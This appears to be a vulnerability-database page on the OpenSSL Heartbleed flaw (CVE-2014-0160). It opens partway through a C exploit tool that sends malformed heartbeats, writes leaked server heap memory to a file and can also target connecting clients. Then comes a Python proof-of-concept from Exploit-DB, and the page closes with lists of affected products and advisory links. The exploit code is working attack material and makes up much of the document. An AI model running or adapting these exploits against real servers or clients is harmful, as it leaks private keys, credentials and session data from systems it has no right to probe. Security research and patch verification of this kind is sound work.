SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
}
if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
mac = mac_tmp;
ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
rr->length -= mac_size;
}
else{
rr->length -= mac_size;
mac = &rr->data[rr->length];
}
i = tls1_mac(s,md,0);
if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
enc_err = -1;
if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)
enc_err = -1;
}
if(enc_err < 0){
al=SSL_AD_BAD_RECORD_MAC;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
goto apple;
}
if(s->expand != NULL){
if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {
al=SSL_AD_RECORD_OVERFLOW;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
goto apple;
}
if (!ssl3_do_uncompress(s)) {
al=SSL_AD_DECOMPRESSION_FAILURE;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
goto apple;
}
}
if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {
al=SSL_AD_RECORD_OVERFLOW;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
goto apple;
}
rr->off=0;
s->packet_length=0;
dtls1_record_bitmap_update(s, &(s->d1->bitmap));
if(first==0){
uint heartbleed_len = 0;
char* fp = s->s3->rrec.data;
(long)fp++;
memcpy(&heartbleed_len,fp,2);
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
first = 2;
leakbytes = heartbleed_len + 16;
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
}
if(verbose==1){
{ unsigned int z; for (z=0; zlength; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
leakbytes-=rr->length;
if(leakbytes > 0){
repeat = 1;
}
else{
repeat = 0;
}
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
int output = s->s3->rrec.length-3;
if(output > 0){
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
if(first==2){
first--;
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
/* first three bytes are resp+len */
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
}
else{
/* heap data & 16 bytes padding */
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
}
close(fd);
}
else{
printf("[ nothing from the heap to write\n");
}
dtls1_stop_timer(c->sslHandle);
c->sslHandle->tlsext_hb_seq++;
c->sslHandle->tlsext_hb_pending = 0;
return;
apple:
printf("[ problem handling SSL record packet - wrong type?\n");
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
return;
}
static DTLS1_BITMAP *
dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)
{
*is_next_epoch = 0;
if (rr->epoch == s->d1->r_epoch)
return &s->d1->bitmap;
else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&
(rr->type == SSL3_RT_HANDSHAKE ||
rr->type == SSL3_RT_ALERT))
{
*is_next_epoch = 1;
return &s->d1->next_bitmap;
}
return NULL;
}
static int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)
{
int cmp;
unsigned int shift;
const unsigned char *seq = s->s3->read_sequence;
cmp = satsub64be(seq,bitmap->max_seq_num);
if (cmp > 0)
{
memcpy (s->s3->rrec.seq_num,seq,8);
return 1;
}
shift = -cmp;
if (shift >= sizeof(bitmap->map)*8)
return 0;
else if (bitmap->map & (1UL<s3->rrec.seq_num,seq,8);
return 1;
}
int satsub64be(const unsigned char *v1,const unsigned char *v2)
{ int ret,sat,brw,i;
if (sizeof(long) == 8) do
{ const union { long one; char little; } is_endian = {1};
long l;
if (is_endian.little) break;
if (((size_t)v1|(size_t)v2)&0x7) break;
l = *((long *)v1);
l -= *((long *)v2);
if (l>128) return 128;
else if (l<-128) return -128;
else return (int)l;
} while (0);
ret = (int)v1[7]-(int)v2[7];
sat = 0;
brw = ret>>8;
if (ret & 0x80)
{ for (i=6;i>=0;i--)
{ brw += (int)v1[i]-(int)v2[i];
sat |= ~brw;
brw >>= 8;
}
}
else
{ for (i=6;i>=0;i--)
{ brw += (int)v1[i]-(int)v2[i];
sat |= brw;
brw >>= 8;
}
}
brw <<= 8;
if (sat&0xff) return brw | 0x80;
else return brw + (ret&0xFF);
}
static int
dtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)
{
DTLS1_RECORD_DATA *rdata;
pitem *item;
if (pqueue_size(queue->q) >= 100)
return 0;
rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));
item = pitem_new(priority, rdata);
if (rdata == NULL || item == NULL)
{
if (rdata != NULL) OPENSSL_free(rdata);
if (item != NULL) pitem_free(item);
SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
return(0);
}
rdata->packet = s->packet;
rdata->packet_length = s->packet_length;
memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));
memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));
item->data = rdata;
#ifndef OPENSSL_NO_SCTP
if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
(s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {
BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);
}
#endif
if (pqueue_insert(queue->q, item) == NULL)
{
OPENSSL_free(rdata);
pitem_free(item);
return(0);
}
s->packet = NULL;
s->packet_length = 0;
memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));
memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));
if (!ssl3_setup_buffers(s))
{
SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
OPENSSL_free(rdata);
pitem_free(item);
return(0);
}
return(1);
}
static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)
{
int cmp;
unsigned int shift;
const unsigned char *seq = s->s3->read_sequence;
cmp = satsub64be(seq,bitmap->max_seq_num);
if (cmp > 0)
{
shift = cmp;
if (shift < sizeof(bitmap->map)*8)
bitmap->map <<= shift, bitmap->map |= 1UL;
else
bitmap->map = 1UL;
memcpy(bitmap->max_seq_num,seq,8);
}
else {
shift = -cmp;
if (shift < sizeof(bitmap->map)*8)
bitmap->map |= 1UL< - the server to target\n");
printf("[ --port|-p - the port to target\n");
printf("[ --file|-f - file to write data to\n");
printf("[ --bind|-b - bind to ip for exploiting clients\n");
printf("[ --precmd|-c - send precmd buffer (STARTTLS)\n");
printf("[ 0 = SMTP\n");
printf("[ 1 = POP3\n");
printf("[ 2 = IMAP\n");
printf("[ --loop|-l - loop the exploit attempts\n");
printf("[ --type|-t - select exploit to try\n");
printf("[ 0 = null length\n");
printf("[ 1 = max leak\n");
printf("[ n = heartbeat payload_length\n");
printf("[ --udp|-u - use dtls/udp\n");
printf("[\n");
printf("[ --verbose|-v - output leak to screen\n");
printf("[ --help|-h - this output\n");
printf("[\n");
exit(0);
}
int main(int argc, char* argv[]){
int ret, port, userc, index;
int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;
int loop = 0;
struct hostent *h;
connection* c;
char *host, *file;
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
printf("[ =============================================================\n");
static struct option options[] = {
{"server", 1, 0, 's'},
{"port", 1, 0, 'p'},
{"file", 1, 0, 'f'},
{"type", 1, 0, 't'},
{"bind", 1, 0, 'b'},
{"verbose", 0, 0, 'v'},
{"precmd", 1, 0, 'c'},
{"loop", 0, 0, 'l'},
{"help", 0, 0,'h'},
{"udp", 0, 0, 'u'}
};
while(userc != -1) {
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);
switch(userc) {
case -1:
break;
case 's':
if(ihost==0){
ihost = 1;
h = gethostbyname(optarg);
if(h==NULL){
printf("[!] FATAL: unknown host '%s'\n",optarg);
exit(1);
}
host = malloc(strlen(optarg) + 1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
}
break;
case 'p':
if(iport==0){
port = atoi(optarg);
iport = 1;
}
break;
case 'f':
if(ifile==0){
file = malloc(strlen(optarg) + 1);
if(file==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(file,"%s",optarg);
ifile = 1;
}
break;
case 't':
if(itype==0){
type = atoi(optarg);
itype = 1;
}
break;
case 'h':
usage();
break;
case 'b':
if(ihost==0){
ihost = 1;
host = malloc(strlen(optarg)+1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
bind = 1;
}
break;
case 'c':
if(iprecmd == 0){
iprecmd = 1;
precmd = atoi(optarg);
}
break;
case 'v':
verbose = 1;
break;
case 'l':
loop = 1;
break;
case 'u':
udp = 1;
break;
default:
break;
}
}
if(ihost==0||iport==0||ifile==0||itype==0){
printf("[ try --help\n");
exit(0);
}
ssl_init();
if(bind==0){
if (udp){
c = dtls_client(ret, host, port);
dtlsheartbleed(c, type);
dtlssneakyleaky(c,file,verbose);
while(repeat==1){
dtlssneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=1;
dtlsheartbleed(c,type);
while(repeat==1){
dtlssneakyleaky(c,file,verbose);
}
}
}
else {
ret = tcp_connect(host, port);
pre_cmd(ret, precmd, verbose);
c = tls_connect(ret);
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=1;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
}
SSL_shutdown(c->sslHandle);
close (ret);
SSL_free(c->sslHandle);
}
else{
int sd, pid, i;
if (udp) {
c = dtls_server(sd, host, port);
while (1) {
char * bytes = malloc(1024);
struct sockaddr_in peer;
socklen_t len = sizeof(peer);
if (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {
dtlsheartbleed(c,type);
dtlssneakyleaky(c,file,verbose);
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=0;
dtlsheartbleed(c,type);
while(repeat==1){
dtlssneakyleaky(c,file,verbose);
}
}
}
}
}
else {
ret = tcp_bind(host, port);
while(1){
sd=accept(ret,0,0);
if(sd==-1){
printf("[!] FATAL: problem with accept()\n");
exit(0);
}
if(pid=fork()){
close(sd);
}
else{
c = tls_bind(sd);
pre_cmd(ret, precmd, verbose);
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=0;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
}
}
}
}
Exploit Database EDB-ID : 32745
Publication date : 2014-04-07 22:00 +00:00
Author : Jared Stafford
EDB Verified : Yes
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
Products Mentioned
Configuraton 0
Openssl>>Openssl >> Version From (including) 1.0.1 To (excluding) 1.0.1g
- Openssl>>Openssl >> Version 1.0.1 (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1 (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1 (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1 (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1 (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1a (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1b (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1c (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1d (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1e (Open CPE detail)
- Openssl>>Openssl >> Version 1.0.1f (Open CPE detail)
Configuraton 0
Filezilla-project>>Filezilla_server >> Version To (excluding) 0.9.44
- Filezilla-project>>Filezilla_server >> Version 0.9.6 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.21 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.22 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.26 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.27 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.28 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.29 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.30 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.31 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.32 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.33 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.34 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.35 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.36 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.37 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.38 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.39 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.40 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.41 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.42 (Open CPE detail)
- Filezilla-project>>Filezilla_server >> Version 0.9.43 (Open CPE detail)
Configuraton 0
Siemens>>Application_processing_engine_firmware >> Version 2.0
- Siemens>>Application_processing_engine_firmware >> Version 2.0 (Open CPE detail)
Siemens>>Application_processing_engine >> Version -
- Siemens>>Application_processing_engine >> Version - (Open CPE detail)
Configuraton 0
Siemens>>Cp_1543-1_firmware >> Version 1.1
- Siemens>>Cp_1543-1_firmware >> Version 1.1 (Open CPE detail)
Siemens>>Cp_1543-1 >> Version -
- Siemens>>Cp_1543-1 >> Version - (Open CPE detail)
Configuraton 0
Siemens>>Simatic_s7-1500_firmware >> Version 1.5
- Siemens>>Simatic_s7-1500_firmware >> Version 1.5 (Open CPE detail)
Siemens>>Simatic_s7-1500 >> Version -
- Siemens>>Simatic_s7-1500 >> Version - (Open CPE detail)
Configuraton 0
Siemens>>Simatic_s7-1500t_firmware >> Version 1.5
- Siemens>>Simatic_s7-1500t_firmware >> Version 1.5 (Open CPE detail)
Siemens>>Simatic_s7-1500t >> Version -
- Siemens>>Simatic_s7-1500t >> Version - (Open CPE detail)
Configuraton 0
Siemens>>Elan-8.2 >> Version To (excluding) 8.3.3
- Siemens>>Elan-8.2 >> Version - (Open CPE detail)
Siemens>>Wincc_open_architecture >> Version 3.12
- Siemens>>Wincc_open_architecture >> Version 3.12 (Open CPE detail)
Configuraton 0
Intellian>>V100_firmware >> Version 1.20
- Intellian>>V100_firmware >> Version 1.20 (Open CPE detail)
Intellian>>V100_firmware >> Version 1.21
- Intellian>>V100_firmware >> Version 1.21 (Open CPE detail)
Intellian>>V100_firmware >> Version 1.24
- Intellian>>V100_firmware >> Version 1.24 (Open CPE detail)
Intellian>>V100 >> Version -
- Intellian>>V100 >> Version - (Open CPE detail)
Configuraton 0
Intellian>>V60_firmware >> Version 1.15
- Intellian>>V60_firmware >> Version 1.15 (Open CPE detail)
Intellian>>V60_firmware >> Version 1.25
- Intellian>>V60_firmware >> Version 1.25 (Open CPE detail)
Intellian>>V60 >> Version -
- Intellian>>V60 >> Version - (Open CPE detail)
Configuraton 0
Mitel>>Micollab >> Version 6.0
- Mitel>>Micollab >> Version 6.0 (Open CPE detail)
Mitel>>Micollab >> Version 7.0
- Mitel>>Micollab >> Version 7.0 (Open CPE detail)
Mitel>>Micollab >> Version 7.1
- Mitel>>Micollab >> Version 7.1 (Open CPE detail)
Mitel>>Micollab >> Version 7.2
- Mitel>>Micollab >> Version 7.2 (Open CPE detail)
Mitel>>Micollab >> Version 7.3
- Mitel>>Micollab >> Version 7.3 (Open CPE detail)
- Mitel>>Micollab >> Version 7.3 (Open CPE detail)
Mitel>>Micollab >> Version 7.3.0.104
- Mitel>>Micollab >> Version 7.3.0.104 (Open CPE detail)
Mitel>>Mivoice >> Version 1.1.2.5
- Mitel>>Mivoice >> Version 1.1.2.5 (Open CPE detail)
Mitel>>Mivoice >> Version 1.1.3.3
- Mitel>>Mivoice >> Version 1.1.3.3 (Open CPE detail)
Mitel>>Mivoice >> Version 1.2.0.11
- Mitel>>Mivoice >> Version 1.2.0.11 (Open CPE detail)
Mitel>>Mivoice >> Version 1.3.2.2
- Mitel>>Mivoice >> Version 1.3.2.2 (Open CPE detail)
Mitel>>Mivoice >> Version 1.4.0.102
- Mitel>>Mivoice >> Version 1.4.0.102 (Open CPE detail)
Configuraton 0
Opensuse>>Opensuse >> Version 12.3
- Opensuse>>Opensuse >> Version 12.3 (Open CPE detail)
Opensuse>>Opensuse >> Version 13.1
- Opensuse>>Opensuse >> Version 13.1 (Open CPE detail)
Configuraton 0
Canonical>>Ubuntu_linux >> Version 12.04
- Canonical>>Ubuntu_linux >> Version 12.04 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 12.10
- Canonical>>Ubuntu_linux >> Version 12.10 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 13.10
- Canonical>>Ubuntu_linux >> Version 13.10 (Open CPE detail)
Configuraton 0
Fedoraproject>>Fedora >> Version 19
- Fedoraproject>>Fedora >> Version 19 (Open CPE detail)
Fedoraproject>>Fedora >> Version 20
- Fedoraproject>>Fedora >> Version 20 (Open CPE detail)
Configuraton 0
Redhat>>Gluster_storage >> Version 2.1
- Redhat>>Gluster_storage >> Version 2.1 (Open CPE detail)
Redhat>>Storage >> Version 2.1
- Redhat>>Storage >> Version 2.1 (Open CPE detail)
Redhat>>Virtualization >> Version 6.0
- Redhat>>Virtualization >> Version 6.0 (Open CPE detail)
Redhat>>Enterprise_linux_desktop >> Version 6.0
- Redhat>>Enterprise_linux_desktop >> Version 6.0 (Open CPE detail)
- Redhat>>Enterprise_linux_desktop >> Version 6.0 (Open CPE detail)
- Redhat>>Enterprise_linux_desktop >> Version 6.0 (Open CPE detail)
Redhat>>Enterprise_linux_server >> Version 6.0
- Redhat>>Enterprise_linux_server >> Version 6.0 (Open CPE detail)
- Redhat>>Enterprise_linux_server >> Version 6.0 (Open CPE detail)
- Redhat>>Enterprise_linux_server >> Version 6.0 (Open CPE detail)
Redhat>>Enterprise_linux_server_aus >> Version 6.5
- Redhat>>Enterprise_linux_server_aus >> Version 6.5 (Open CPE detail)
Redhat>>Enterprise_linux_server_eus >> Version 6.5
- Redhat>>Enterprise_linux_server_eus >> Version 6.5 (Open CPE detail)
Redhat>>Enterprise_linux_server_tus >> Version 6.5
- Redhat>>Enterprise_linux_server_tus >> Version 6.5 (Open CPE detail)
Redhat>>Enterprise_linux_workstation >> Version 6.0
- Redhat>>Enterprise_linux_workstation >> Version 6.0 (Open CPE detail)
- Redhat>>Enterprise_linux_workstation >> Version 6.0 (Open CPE detail)
- Redhat>>Enterprise_linux_workstation >> Version 6.0 (Open CPE detail)
Configuraton 0
Debian>>Debian_linux >> Version 6.0
- Debian>>Debian_linux >> Version 6.0 (Open CPE detail)
Debian>>Debian_linux >> Version 7.0
- Debian>>Debian_linux >> Version 7.0 (Open CPE detail)
Debian>>Debian_linux >> Version 8.0
- Debian>>Debian_linux >> Version 8.0 (Open CPE detail)
Configuraton 0
Ricon>>S9922l_firmware >> Version 16.10.3\(3794\)
- Ricon>>S9922l_firmware >> Version 16.10.3\(3794\) (Open CPE detail)
Ricon>>S9922l >> Version 1.0
- Ricon>>S9922l >> Version 1.0 (Open CPE detail)
Configuraton 0
Broadcom>>Symantec_messaging_gateway >> Version 10.6.0
Broadcom>>Symantec_messaging_gateway >> Version 10.6.1
Configuraton 0
Splunk>>Splunk >> Version From (including) 6.0.0 To (excluding) 6.0.3
- Splunk>>Splunk >> Version 6.0.0 (Open CPE detail)
- Splunk>>Splunk >> Version 6.0.1 (Open CPE detail)
- Splunk>>Splunk >> Version 6.0.2 (Open CPE detail)
References
https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217
Tags : Third Party Advisory
Tags : Third Party Advisory
http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/
Tags : Third Party Advisory
Tags : Third Party Advisory
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
Tags : Broken Link
Tags : Broken Link
http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf
Tags : Broken Link, Third Party Advisory
Tags : Broken Link, Third Party Advisory
http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf
Tags : Not Applicable
Tags : Not Applicable
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed
Tags : vendor-advisory
Tags : vendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html
Tags : vendor-advisory
Tags : vendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html
Tags : vendor-advisory
Tags : vendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.html
Tags : vendor-advisory
Tags : vendor-advisory
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
Tags : Patch, Third Party Advisory
Tags : Patch, Third Party Advisory
http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html
Tags : Patch, Third Party Advisory
Tags : Patch, Third Party Advisory
https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html
Tags : Third Party Advisory
Tags : Third Party Advisory
http://git.openssl.org/gitweb/?p=openssl.git%3Ba=commit%3Bh=96db9023b881d7cd9f379b0c154650d6c108e9a3
Tags : Broken Link
Tags : Broken Link
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00
Tags : Third Party Advisory
Tags : Third Party Advisory
https://www.cert.fi/en/reports/2014/vulnerability788210.html
Tags : Not Applicable, Third Party Advisory
Tags : Not Applicable, Third Party Advisory
http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/
Tags : Issue Tracking, Third Party Advisory
Tags : Issue Tracking, Third Party Advisory
http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3
Tags : Permissions Required, Third Party Advisory
Tags : Permissions Required, Third Party Advisory
https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008
Tags : Third Party Advisory
Tags : Third Party Advisory
http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1
Tags : Third Party Advisory
Tags : Third Party Advisory
https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list
Tags : mailing-list
https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list
Tags : mailing-list
https://sku11army.blogspot.com/2020/01/heartbleed-hearts-continue-to-bleed.html
Tags : Exploit, Permissions Required, Third Party Advisory
Tags : Exploit, Permissions Required, Third Party Advisory
https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list
Tags : mailing-list
https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list
Tags : mailing-list
https://yunus-shn.medium.com/ricon-industrial-cellular-router-heartbleed-attack-2634221c02bd
Tags : Broken Link, Exploit, Third Party Advisory
Tags : Broken Link, Exploit, Third Party Advisory
2024©
tesweb SA
